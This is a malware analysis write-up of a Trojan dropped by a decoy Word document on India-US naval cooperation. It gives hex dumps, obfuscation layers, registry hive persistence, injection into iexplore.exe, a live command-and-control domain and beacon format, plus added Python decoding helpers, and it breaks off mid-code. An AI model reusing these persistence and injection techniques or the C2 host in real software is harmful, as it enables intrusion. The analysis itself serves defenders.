India-United States Naval Cooperation.doc Analysis
- Today I will analyze the following file and its payload.
File Name: file-1938795_doc
File Size: 170854 bytes
MD5: cc380bfd97164aff5878075e78570ada
SHA1: 39ab7902e67f668fa0314fa02f6ca4a1ad1f009d
AV: 7/41 (17.1%) VirusTotal
- Typically I do not focus on the exploit because everyone else does.
- I do, however, focus on the obfuscation technique used in the sample. I typically start by dumping the file in WinHex to see if I can figure out how the payload is obfuscated; if I cannot, then I look at the shellcode. In this case the payload is not hidden very well.
- At file-offset 0x880 we see an executable file stored as ASCII hex (every byte written out as two hex characters, so the blob is twice the size of the binary it encodes):
00000000 35 41 34 44 30 30 39 30 30 30 30 33 30 30 30 30 5A4D009000030000
00000010 30 30 30 34 30 30 30 30 46 46 46 46 30 30 30 30 00040000FFFF0000
00000020 30 30 42 38 30 30 30 30 30 30 30 30 30 30 30 30 00B8000000000000
00000030 30 30 34 30 30 30 30 30 30 30 30 30 30 30 30 30 0040000000000000
00000040 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000050 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000060 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 30 0000000000000000
00000070 30 30 30 30 30 30 30 30 30 30 45 38 30 30 30 30 0000000000E80000
00000080 31 46 30 45 30 45 42 41 42 34 30 30 43 44 30 39 1F0E0EBAB400CD09
00000090 42 38 32 31 34 43 30 31 32 31 43 44 36 38 35 34 B8214C0121CD6854
000000A0 37 33 36 39 37 30 32 30 36 46 37 32 37 32 36 37 736970206F727267
000000B0 36 44 36 31 36 33 32 30 36 45 36 31 36 46 36 45 6D6163206E616F6E
000000C0 32 30 37 34 36 35 36 32 37 32 32 30 36 45 37 35 2074656272206E75
000000D0 36 39 32 30 32 30 36 45 34 46 34 34 32 30 35 33 6920206E4F442053
000000E0 36 46 36 44 36 35 36 34 30 44 32 45 30 41 30 44 6F6D65640D2E0A0D
000000F0 30 30 32 34 30 30 30 30 30 30 30 30 30 30 30 30 0024000000000000
00000100 41 31 39 33 43 30 41 41 43 30 44 37 39 33 43 34 A193C0AAC0D793C4
- When we convert this ASCII hex back into raw bytes the executable is more apparent; however, the first 0x200 bytes have been byte-swapped one 16-bit word at a time (the MZ signature reads as ZM and the DOS stub text is scrambled pairwise):
00000000 5A 4D 00 90 00 03 00 00 00 04 00 00 FF FF 00 00 ZM ÿÿ
00000010 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 ¸ @
00000020 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 E8 00 00 è
00000040 1F 0E 0E BA B4 00 CD 09 B8 21 4C 01 21 CD 68 54 º´ Í ¸!L !ÍhT
00000050 73 69 70 20 6F 72 72 67 6D 61 63 20 6E 61 6F 6E sip orrgmac naon
00000060 20 74 65 62 72 20 6E 75 69 20 20 6E 4F 44 20 53 tebr nui nOD S
00000070 6F 6D 65 64 0D 2E 0A 0D 00 24 00 00 00 00 00 00 omed . $
00000080 A1 93 C0 AA C0 D7 93 C4 ¡“ÀªÀדÄ
- Once we undo the byte-swap, we carve out the following executable:
File Name: Payload.exe
File Size: 38912 bytes
MD5: c5860171f919761db9ee78ef3dac5ab4
SHA1: 91c40d179b68f27c2cc84214579fe940feb59539
PE Time: 0x4D06DE02 [Tue Dec 14 03:01:22 2010 UTC]
AV: 21/41 (51.2%) VirusTotal
- And the following decoy file, whose metadata suggests the original document name was India-United States Naval Cooperation.doc:
File Name: decoy.doc
File Size: 45392 bytes
MD5: d471c78f4de177f959342814107ec3f4
SHA1: 186ed1d4f9f271c72f10e1fbd7c198854d14ff31
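- As an added example (this is not code from the write-up, and the document it runs on is constructed here), the carving step above in Python: decode the ASCII-hex blob found at file-offset 0x880, undo the 16-bit byte-swap over the first 0x200 bytes, and confirm an MZ header and a readable DOS stub come out. The only real input is the hex text printed above; the 38912-byte size of the full payload is taken from the file listing.

```python
# Added example, not code from the write-up: recover the embedded PE from the
# ASCII-hex blob at file-offset 0x880 of the document. In the decoded image the
# two bytes of every 16-bit word in the first 0x200 bytes are swapped, which is
# why the header reads "ZM" and the DOS stub text is scrambled pairwise.
import struct

SWAPPED_LEN = 0x200  # extent of the byte-swapped prefix, as stated in the analysis

# Constructed sample input: the first 17 rows of the ASCII-hex region exactly as
# printed above (the real blob runs on for the whole 38912-byte payload).
ASCII_HEX_SAMPLE = (
    "5A4D009000030000" "00040000FFFF0000" "00B8000000000000" "0040000000000000"
    "0000000000000000" "0000000000000000" "0000000000000000" "0000000000E80000"
    "1F0E0EBAB400CD09" "B8214C0121CD6854" "736970206F727267" "6D6163206E616F6E"
    "2074656272206E75" "6920206E4F442053" "6F6D65640D2E0A0D" "0024000000000000"
    "A193C0AAC0D793C4"
)


def unswap_words(data: bytes, length: int = SWAPPED_LEN) -> bytes:
    """Swap the two bytes of each 16-bit word in data[:length]; the rest is untouched."""
    head = bytearray(data[:length])
    for i in range(0, len(head) - 1, 2):
        head[i], head[i + 1] = head[i + 1], head[i]
    return bytes(head) + data[length:]


def carve(doc: bytes, offset: int, size: int) -> bytes:
    """Decode `size` bytes of ASCII hex found at `offset` in the document and
    undo the word swap. Raises if the result does not start with an MZ header."""
    hex_text = doc[offset:offset + 2 * size].decode("ascii")
    pe = unswap_words(bytes.fromhex(hex_text))
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header after un-swapping: wrong offset or encoding?")
    return pe


def e_lfanew(pe: bytes) -> int:
    """Offset of the PE header (DWORD at 0x3C of the DOS header)."""
    return struct.unpack_from("<I", pe, 0x3C)[0]


def carve_sample() -> bytes:
    """Run carve() over a constructed document: 0x880 bytes of padding, then the sample blob."""
    doc = b"\0" * 0x880 + ASCII_HEX_SAMPLE.encode("ascii")
    return carve(doc, 0x880, len(ASCII_HEX_SAMPLE) // 2)


if __name__ == "__main__":
    image = carve_sample()
    print(image[:16].hex(" "), "e_lfanew=%#x" % e_lfanew(image))
    print(image[0x4E:0x75])  # the DOS stub message, readable again
```

- Against the real document you would call carve(doc, 0x880, 38912) and then check that the PE header at e_lfanew (0xE8 here, i.e. inside the swapped region, so it too is only readable after the un-swap) begins with "PE\0\0" before trusting the carve.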
ANALYSIS – payload.exe
File Name: Payload.exe
File Size: 38912 bytes
MD5: c5860171f919761db9ee78ef3dac5ab4
SHA1: 91c40d179b68f27c2cc84214579fe940feb59539
PE Time: 0x4D06DE02 [Tue Dec 14 03:01:22 2010 UTC]
AV: 21/41 (51.2%) VirusTotal
- This payload contains a resource type named JPG (the entries are not JPEG images), which holds two obfuscated resources named 101 and 102 that it decrypts and saves as two separate files:

- Here are the characteristics of these resources:
File Name: 101.res
File Size: 4608 bytes
MD5: 92c0cbcc8127c5b59ce3af37e454caae
SHA1: 14f5fdcbbec17cb621f2b3c72e00d54efde437d4
File Name: 102.res
File Size: 26932 bytes
MD5: d4a79df7a9e459c51c1ef366fba01843
SHA1: 4e39a3b59c01da4834a4fd16dbb87748e129315
- Resource name 101 is saved under C:\Documents and Settings\username\Application Data\Microsoft\Messenger\Plugin, and it has the following characteristics:
File Name: msgslang.exe
File Size: 4608 bytes
MD5: 0835fbfd411d448e1e7b144f281a0ced
SHA1: 4f2f79b368e1f871f3fdec797d0563785f50c25f
PE Time: 0x4D06D945 [Tue Dec 14 02:41:09 2010 UTC]
AV: 8/43 (18.6%) VirusTotal
- Resource name 102 is saved under: C:\Documents and Settings\username\Local Settings\Application Data\Microsoft\Media Player, and it has the following characteristics:
File Name: SOUND735.WAV
File Size: 26932 bytes
MD5: 7d2688c9dfb33be1c025216989376988
SHA1: c8968964cf4d38d9a516bf617d9cc10c8483862e
AV: This file is encrypted and not a valid PE file.
- File msgslang.exe is then executed.
- File payload.exe also creates C:\Documents and Settings\username\a.hiv, which at first contains a hive dump of:
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
- A new registry key, SOFTWARE\printer, is created and the contents of a.hiv are restored into it.
- A new value is then written under SOFTWARE\printer to entrench the Trojan:
- load = C:\DOCUME~1\username\Applic~1\MICROS~1\MESSEN~1\Plugin\msgslang.exe
- The SOFTWARE\printer hive is then dumped into C:\Documents and Settings\username\b.hiv, and b.hiv is restored into:
- SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows
- The net effect is that the Load value under Windows NT\CurrentVersion\Windows now points at msgslang.exe. That value is a legitimate autostart location (whatever it names is run at user logon), so the Trojan gains persistence without touching the usual Run keys, and the value is never written directly to the autostart key: it is set on a scratch key and copied over by restoring a hive file. On a suspect host the Load value under that key is a quick thing to check; it is normally absent.
- Files a.hiv and b.hiv are then deleted, as is the SOFTWARE\printer key.
- File payload.exe is then deleted.
ANALYSIS – msgslang.exe
- File msgslang.exe opens file SOUND735.WAV and XORs the whole file with 0x47.
- File msgslang.exe then launches an instance of iexplore.exe in suspended mode:
004012D1 |. 51 PUSH ECX ; /pProcessInfo
004012D2 |. 52 PUSH EDX ; |pStartupInfo
004012D3 |. 6A 00 PUSH 0 ; |CurrentDir = NULL
004012D5 |. 6A 00 PUSH 0 ; |pEnvironment = NULL
004012D7 |. 6A 04 PUSH 4 ; |CreationFlags = CREATE_SUSPENDED
004012D9 |. 6A 00 PUSH 0 ; |InheritHandles = FALSE
004012DB |. 6A 00 PUSH 0 ; |pThreadSecurity = NULL
004012DD |. 6A 00 PUSH 0 ; |pProcessSecurity = NULL
004012DF |. 8D8424 D4000000 LEA EAX, DWORD PTR SS:[ESP+D4] ; |
004012E6 |. 6A 00 PUSH 0 ; |CommandLine = NULL
004012E8 |. 50 PUSH EAX ; |ModuleFileName = "C:\Program Files\Internet Explorer\iexplore.exe"
004012E9 |. FF15 20204000 CALL DWORD PTR DS:[<&KERNEL32.Crea>; \CreateProcessA
- It then writes the decrypted content of SOUND735.WAV into the address space of the newly created (still suspended) process.
- It then calls CreateRemoteThread with the address at which the decrypted SOUND735.WAV was written as the thread start address, so the decrypted blob runs inside iexplore.exe. A child created with CREATE_SUSPENDED, a cross-process memory write and a remote thread is a textbook injection sequence, and it is the point at which behavioural monitoring should catch this sample.
ANALYSIS - SOUND735.WAV (XOR-ed with 0x47)
- The first interesting thing this thread does is nibble-swap (exchange the high and low four bits of) every byte from file-offset 0x461 to the end of the data.
- If you have never seen nibble-swapping in assembly, here it is:
00150443 8A07 MOV AL, BYTE PTR DS:[EDI] ; AL = next byte
00150445 8AC8 MOV CL, AL ; keep a copy in CL
00150447 C0E0 04 SHL AL, 4 ; AL = low nibble moved up (high nibble shifted out)
0015044A C0E9 04 SHR CL, 4 ; CL = high nibble moved down
0015044D 80E1 0F AND CL, 0F ; mask (redundant after an 8-bit SHR, but harmless)
00150450 0AC1 OR AL, CL ; recombine into the swapped byte
00150452 8807 MOV BYTE PTR DS:[EDI], AL ; write it back in place
- The nibble-swapped data is more code, which is executed right away.
- This code first XORs 0x134 bytes of the nibble-swapped data (starting at file-offset 0x7C1) with 0x99.
- The configuration data of this Trojan is stored at the beginning of the file. At this point, since that data has already been XORed with 0x47, it is now XORed with 0xFF (i.e. every byte is inverted). Because 0x47 XOR 0xFF = 0xB8, the configuration can be pulled straight out of the original SOUND735.WAV by XORing it with 0xB8.
- The configuration information looks as follows:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000030 34 69 00 00 0E 00 00 00 4i
00000040 09 00 00 00 D0 03 00 00 33 00 00 00 2E 04 00 00 Ð 3 .
00000050 21 00 00 00 61 04 00 00 54 61 72 67 65 74 00 00 ! a Target
00000060 00 00 00 00 01 00 00 00 73 70 6F 30 6C 73 76 2E spo0lsv.
00000070 65 78 65 00 00 00 00 00 00 00 00 00 6F 72 64 65 exe orde
00000080 72 2E 65 78 65 00 00 00 00 00 00 00 00 00 00 00 r.exe
00000090 61 64 61 70 69 33 32 2E 64 6C 6C 00 00 00 00 00 adapi32.dll
000000A0 00 00 00 00 77 69 6E 65 63 6B 2E 64 61 74 00 00 wineck.dat
000000B0 00 00 00 00 00 00 00 00 77 69 6E 66 67 68 69 00 winfghi
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 77 69 6E 6A winj
000000D0 68 67 63 33 2E 64 6C 6C 00 00 00 00 00 00 00 00 hgc3.dll
000000E0 77 69 6D 6A 68 67 63 33 2E 64 6C 6C 00 00 00 00 wimjhgc3.dll
000000F0 00 00 00 00 28 6E 75 6C 6C 29 00 00 00 00 00 00 (null)
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000130 69 62 6D 2E 61 73 69 61 2D 6F 6E 6C 69 6E 65 2E ibm.asia-online.
00000140 75 73 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 us:80
00000150 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000160 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000190 00 00 00 00 30 3A 38 30 00 00 00 00 00 00 00 00 0:80
000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001F0 00 00 00 00 00 00 00 00 30 3A 38 30 00 00 00 00 0:80
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000230 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000240 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000250 00 00 00 00 00 00 00 00 00 00 00 00 30 3A 38 30 0:80
00000260 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000270 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000280 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000290 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002C0 30 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 00 0:80
000002D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000002F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000300 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000310 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000320 00 00 00 00 38 30 00 00 00 00 00 00 00 00 00 00 80
00000330 00 00 00 00 03 00 00 00 03 00 00 00 00 00 00 00
00000340 00 00 00 00 01 02 00 00 01 00 00 00 01 02 00 00
00000350 02 00 00 00 01 01 00 00 03 00 00 00 01 01 00 00
00000360 04 00 00 00 00 01 00 00 05 00 00 00 01 02 00 00
00000370 06 00 00 00 00 01 00 00 07 00 00 00 01 02 00 00
00000380 08 00 00 00 01 01 00 00 09 00 00 00 00 03 00 00
00000390 0A 00 00 00 00 03 00 00 0B 00 00 00 00 03 00 00
000003A0 0C 00 00 00 01 03 00 00 0D 00 00 00 01 03 00 00
000003B0 00 00 00 00 00 00 00 00 17 00 00 00 01 00 00 00
000003C0 64 61 74 00 00 00 00 00 00 00 00 00 00 00 00 00 dat
- As you can see, this Trojan can be configured with up to five domain/IP addresses, held in five 100-byte (0x64) host:port slots starting at offset 0x130 (0x130, 0x194, 0x1F8, 0x25C, 0x2C0). Only Addr1 is populated here (ibm.asia-online.us:80); the other four hold the placeholder 0:80.
- The configuration information is reformatted (shown below, in the clear) and stored, encrypted, into the following file:
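- As an added example (not code from the write-up; the input is a constructed stand-in for SOUND735.WAV, not the real file), the layered de-obfuscation described above and a reader for the configuration dump just shown. The offsets and keys (0x47 over the whole file, nibble swap from 0x461, 0x99 over 0x134 bytes at 0x7C1, 0xFF over the configuration, and the 0xB8 shortcut) are the ones given in the analysis; the string field offsets and the five 100-byte address slots are read off the dump. The configuration length of 0x3D0 is an assumption from the extent of the dump.

```python
# Added example, not code from the write-up: replay the layered de-obfuscation
# of SOUND735.WAV and pull the configuration out of it. Offsets and keys are the
# ones given in the analysis; the field layout comes from the configuration dump.

NIBBLE_SWAP_FROM = 0x461            # injected thread nibble-swaps from here to EOF
XOR99_AT, XOR99_LEN = 0x7C1, 0x134  # ...then XORs this range with 0x99
CONFIG_LEN = 0x3D0                  # assumption: config spans 0x000-0x3CF as in the dump

STRING_FIELDS = [0x58, 0x68, 0x7C, 0x90, 0xA4, 0xB8, 0xCC, 0xE0, 0xF4]  # NUL-terminated strings
ADDR_BASE, ADDR_STRIDE, ADDR_COUNT = 0x130, 0x64, 5  # five 100-byte host:port slots


def nibble_swap(b: int) -> int:
    """Same result as the MOV/SHL/SHR/AND/OR sequence shown above."""
    return ((b << 4) & 0xF0) | (b >> 4)


def xor_range(buf: bytearray, start: int, length: int, key: int) -> None:
    for i in range(start, min(start + length, len(buf))):
        buf[i] ^= key


def decode_stages(wav: bytes) -> bytearray:
    """Apply the three transforms in the order msgslang.exe and the thread apply them."""
    buf = bytearray(wav)
    xor_range(buf, 0, len(buf), 0x47)               # msgslang.exe: whole file ^ 0x47
    for i in range(NIBBLE_SWAP_FROM, len(buf)):     # thread: nibble-swap from 0x461
        buf[i] = nibble_swap(buf[i])
    xor_range(buf, XOR99_AT, XOR99_LEN, 0x99)       # thread: 0x134 bytes at 0x7C1 ^ 0x99
    return buf


def config_from_stage(buf: bytes) -> bytes:
    """After the 0x47 stage the config (at the start of the file) is XORed with 0xFF."""
    return bytes(b ^ 0xFF for b in buf[:CONFIG_LEN])


def config_from_original(wav: bytes) -> bytes:
    """The shortcut noted above: 0x47 ^ 0xFF == 0xB8, so one XOR pass recovers the config."""
    return bytes(b ^ 0xB8 for b in wav[:CONFIG_LEN])


def cstr(buf: bytes, off: int) -> str:
    end = buf.find(b"\0", off)
    return buf[off:end if end >= 0 else len(buf)].decode("latin-1")


def parse_config(cfg: bytes) -> dict:
    out = {"str_%#x" % off: cstr(cfg, off) for off in STRING_FIELDS}
    out["addrs"] = [cstr(cfg, ADDR_BASE + i * ADDR_STRIDE) for i in range(ADDR_COUNT)]
    # The DWORD at 0x54 reads 0x461 in the dump, the same offset where the nibble
    # swap starts; whether the code actually reads it from here is not established.
    out["dword_0x54"] = int.from_bytes(cfg[0x54:0x58], "little")
    return out


def build_sample_wav() -> bytes:
    """Constructed stand-in for SOUND735.WAV: a config laid out like the dump and
    XORed with 0xB8, followed by filler bytes standing in for the code region."""
    cfg = bytearray(CONFIG_LEN)
    cfg[0x54:0x58] = (0x461).to_bytes(4, "little")
    strings = [b"Target", b"spo0lsv.exe", b"order.exe", b"adapi32.dll", b"wineck.dat",
               b"winfghi", b"winjhgc3.dll", b"wimjhgc3.dll", b"(null)"]
    for off, s in zip(STRING_FIELDS, strings):
        cfg[off:off + len(s)] = s
    for i, a in enumerate([b"ibm.asia-online.us:80"] + [b"0:80"] * 4):
        off = ADDR_BASE + i * ADDR_STRIDE
        cfg[off:off + len(a)] = a
    filler = bytes((i * 7 + 3) & 0xFF for i in range(0x3000 - CONFIG_LEN))
    return bytes(b ^ 0xB8 for b in cfg) + filler


if __name__ == "__main__":
    wav = build_sample_wav()
    print(parse_config(config_from_original(wav)))
```

- On the real file, decode_stages() gives you the image as it sits in iexplore.exe after both layers have run, and config_from_original() gives the configuration in one pass; the two routes must agree on the configuration bytes, which is a cheap sanity check that the offsets were transcribed correctly.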
- C:\Documents and Settings\username\Cookies\wineck.dat
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00000000 57 69 64 74 68 3A 03 00 00 00 0A 0D 44 65 70 74 Width: Dept
00000010 68 3A 03 00 00 00 0A 0D 41 64 64 72 31 3A 69 62 h: Addr1:ib
00000020 6D 2E 61 73 69 61 2D 6F 6E 6C 69 6E 65 2E 75 73 m.asia-online.us
00000030 3A 38 30 00 00 00 00 00 00 00 00 00 00 00 00 00 :80
00000040 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000050 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000060 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000070 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000080 00 00 0A 0D 41 64 64 72 32 3A 30 3A 38 30 00 00 Addr2:0:80
00000090 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000000A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000000B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000000C0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000000D0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000000E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0A 0D
000000F0 41 64 64 72 33 3A 30 3A 38 30 00 00 00 00 00 00 Addr3:0:80
00000100 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000110 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000130 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000140 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000150 00 00 00 00 00 00 00 00 00 00 0A 0D 41 64 64 72 Addr
00000160 34 3A 30 3A 38 30 00 00 00 00 00 00 00 00 00 00 4:0:80
00000170 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000180 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000190 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001A0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001B0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001C0 00 00 00 00 00 00 0A 0D 41 64 64 72 35 3A 30 3A Addr5:0:
000001D0 38 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80
000001E0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
000001F0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000200 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000210 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000220 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00000230 00 00 0A 0D 53 6C 65 65 70 3A 00 00 00 00 00 00 Sleep:
00000240 00 00 00 00 00 00 00
- The timestamps of this file are backdated to match those of svchost.exe (timestomping), so it does not stand out in a filesystem timeline.
- The key used to encrypt wineck.dat starts at file-offset 0x2E7C of SOUND735.WAV (reminder: to reveal the key you need to XOR this data with 0x47 and nibble-swap it).
- It is unclear at this point where the key ends (other than at the end of the file).
- Here is a chunk of this key (not the complete key) for reference:
Offset 0 1 2 3 4 5 6 7 8 9 A B C D E F
00002E70 7B 7C 7E 7F {|~
00002E80 80 7D 83 84 86 87 AD AE AF B0 B1 B2 B3 B4 B5 B6 €}ƒ„†‡®¯°±²³´µ¶
00002E90 DF E0 E1 E2 E3 E4 E5 E6 E7 E8 CF D0 D1 D2 93 94 ßàáâãäåæçèÏÐÑÒ“”
00002EA0 95 96 06 07 2E EA EB EC ED EE EF F0 F1 F2 32 36 •– .êëìíîïðñò26
00002EB0 37 38 39 3A 23 24 3E FB 4D 9A 9B 9C 9D 9E 9F A0 789:#$>ûMš›œ žŸ
00002EC0 A1 A2 B7 B8 B9 BA BB BC BD BF C0 C1 E3 E5 E6 E4 ¡¢·¸¹º»¼½¿ÀÁãåæä
00002ED0 2F 30 31 32 33 34 17 18 19 1A 1B 1C 1D 1E 92 1F /01234 ’
00002EE0 21 22 23 24 25 26 27 28 29 2A 53 54 55 56 57 40 !"#$%&'()*STUVW@
00002EF0 41 42 43 5C 5D 5E 5F 60 61 62 63 64 65 66 67 68 ABC\]^_`abcdefgh
00002F00 90 6A 6B BE 6E 6F 72 6C 6D 73 74 75 70 C6 71 78 jk¾norlmstupÆqx
00002F10 79 7A 0B 0C 09 0D 0E 0F 10 11 12 13 FD FE C2 C5 yz ýþÂÅ
00002F20 76 77 C7 C8 C9 CA 8F 69 91 92 94 95 4A 4B 93 4C vwÇÈÉÊ i‘’”•JK“L
00002F30 49 96 97 98 99 4E 4F 50 51 52 A3 A4 A5 A6 A7 A9 I–—˜™NOPQR£¤¥¦§©
00002F40 AA AB A8 AC DF E0 E1 E2 2B 2C 2D E7 E8 E9 85 81 ª«¨¬ßàáâ+,-çèé…
00002F50 82 88 89 8B 8C 8A 8D 8E CB CC CD CE 90 91 8F D3 ‚ˆ‰‹ŒŠ ŽËÌÍÎ ‘ Ó
00002F60 D4 D5 D6 D7 D8 D9 DA DB DC DD DE 14 3F 58 59 5A ÔÕÖרÙÚÛÜÝÞ ?XYZ
00002F70 5B 44 45 46 47 48 E9 EA 5E 5F 60 61 EF F0 F1 F2 [DEFGHéê^_`aïðñò
00002F80 F3 F4 F5 F6 F7 F8 F9 20 FA FB FC C3 C4 FF 15 16 óôõö÷øù úûüÃÄÿ
00002F90 15 16 FA 11 3F 40 41 42 43 44 45 46 47 22 CB CC ú ?@ABCDEFG"ËÌ
00002FA0 CD CE CF D0 D1 D2 D3 D4 17 18 1A F5 1B 1D 1E 1F ÍÎÏÐÑÒÓÔ õ
00002FB0 19 20 48 21 23 24 25 26 27 28 29 2A 2B 2C 2D 2E H!#$%&'()*+,-.
00002FC0 30 31 32 33 2F 34 35 36 37 38 39 3A 3B 3C 3D 3E 0123/456789:;<=>
00002FD0 C1 C2 C3 C4 C5 C6 C7 C8 C9 CA 35 36 37 38 39 3A ÁÂÃÄÅÆÇÈÉÊ56789:
- The Trojan resolves ibm.asia-online.us and connects over TCP port 80. At the time of this writing this domain name resolves to IP address 96.44.167.103, however this IP address is not accepting connections on port 80. So, I do not have any sample network data to work with.
- The Trojan sends the following type of request (the bare User-Agent: Mozilla/4.0, the POST to /5501000000/log and the Proxy-Connection header are the obvious fields to build a network signature on):
POST /5501000000/log HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0
Host: ibm.asia-online.us:80
Content-Length: 90
Proxy-Connection: Keep-Alive
00000000 79 7F 24 7F 80 7D 43 2C 87 E3 DB C7 CC C4 D8 DF y $ €}C,‡ãÛÇÌÄØß
00000010 B3 B4 B5 B6 DF E0 E1 E2 E3 E4 E4 E6 E5 E8 CE D0 ³´µ¶ßàáâãääæåèÎÐ
00000020 85 B3 E1 F3 F0 E2 06 07 23 EA EB EC ED EE EF BE …³áóðâ #êëìíîï¾
00000030 F1 F2 32 36 32 39 0A DE 27 24 49 92 23 FF F8 F7 ñò2629 Þ'$I’#ÿø÷
00000040 B3 FA E8 C9 CF C4 D0 D0 D0 BA CC D5 D3 D5 A8 A6 ³úèÉÏÄÐÐкÌÕÓÕ¨¦
00000050 80 D6 91 8D 42 5A 59 55 50 07 €Ö‘ BZYUP
- The data above is encrypted with the same key that was used for file wineck.dat. Its decrypted form is:
00000000 02 03 5A 00 00 00 C0 A8 01 64 76 69 63 74 69 6D Z ˬ dvictim
00000010 00 00 00 00 00 00 00 00 00 00 01 00 02 00 01 00
00000020 54 61 72 67 65 74 00 00 0D 00 00 00 00 00 00 4E Target N
00000030 00 00 00 00 05 01 33 E4 04 00 77 69 6E 65 63 6B 3ä wineck
00000040 2E 64 77 69 6E 66 67 68 69 00 77 69 6E 6A 68 67 .dwinfghi winjhg
00000050 63 33 77 69 6D 6A 68 67 63 33 c3wimjhgc3
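- As an added example (not code from the write-up), the key chunk, the POST body and the decrypted body are copied from the three dumps above and checked against each other. The write-up does not name the cipher; what the dumps turn out to satisfy is a plain byte-wise XOR of the body against the key stream, starting at the first key byte (file-offset 0x2E7C), and that is what the test asserts. The field labels in parse_beacon() are my reading of the decrypted bytes (the request shares the byte 0 = 0x02 and bytes 2-5 = length layout given below for C2 replies, and 192.168.1.100 / "victim" look like the analysis machine), not something the write-up states.

```python
# Added example, not code from the write-up: verify the relation between the
# key stream, the beacon body and the decrypted body shown above, and read the
# obvious fields out of the plaintext.

KEY_STREAM = bytes.fromhex(  # first 90 bytes of the key, file-offset 0x2E7C onward
    "7B7C7E7F"
    "807D83848687ADAEAFB0B1B2B3B4B5B6"
    "DFE0E1E2E3E4E5E6E7E8CFD0D1D29394"
    "959606072EEAEBECEDEEEFF0F1F23236"
    "3738393A23243EFB4D9A9B9C9D9E9FA0"
    "A1A2B7B8B9BABBBCBDBFC0C1E3E5E6E4"
    "2F3031323334"
)
POST_BODY = bytes.fromhex(   # the 90-byte request body (Content-Length: 90)
    "797F247F807D432C87E3DBC7CCC4D8DF"
    "B3B4B5B6DFE0E1E2E3E4E4E6E5E8CED0"
    "85B3E1F3F0E2060723EAEBECEDEEEFBE"
    "F1F2323632390ADE2724499223FFF8F7"
    "B3FAE8C9CFC4D0D0D0BACCD5D3D5A8A6"
    "80D6918D425A59555007"
)
PLAIN_BODY = bytes.fromhex(  # the decrypted form shown above
    "02035A000000C0A8016476696374696D"
    "00000000000000000000010002000100"
    "54617267657400000D0000000000004E"
    "00000000050133E4040077696E65636B"
    "2E6477696E666768690077696E6A6867"
    "633377696D6A68676333"
)


def xor_stream(data: bytes, key: bytes) -> bytes:
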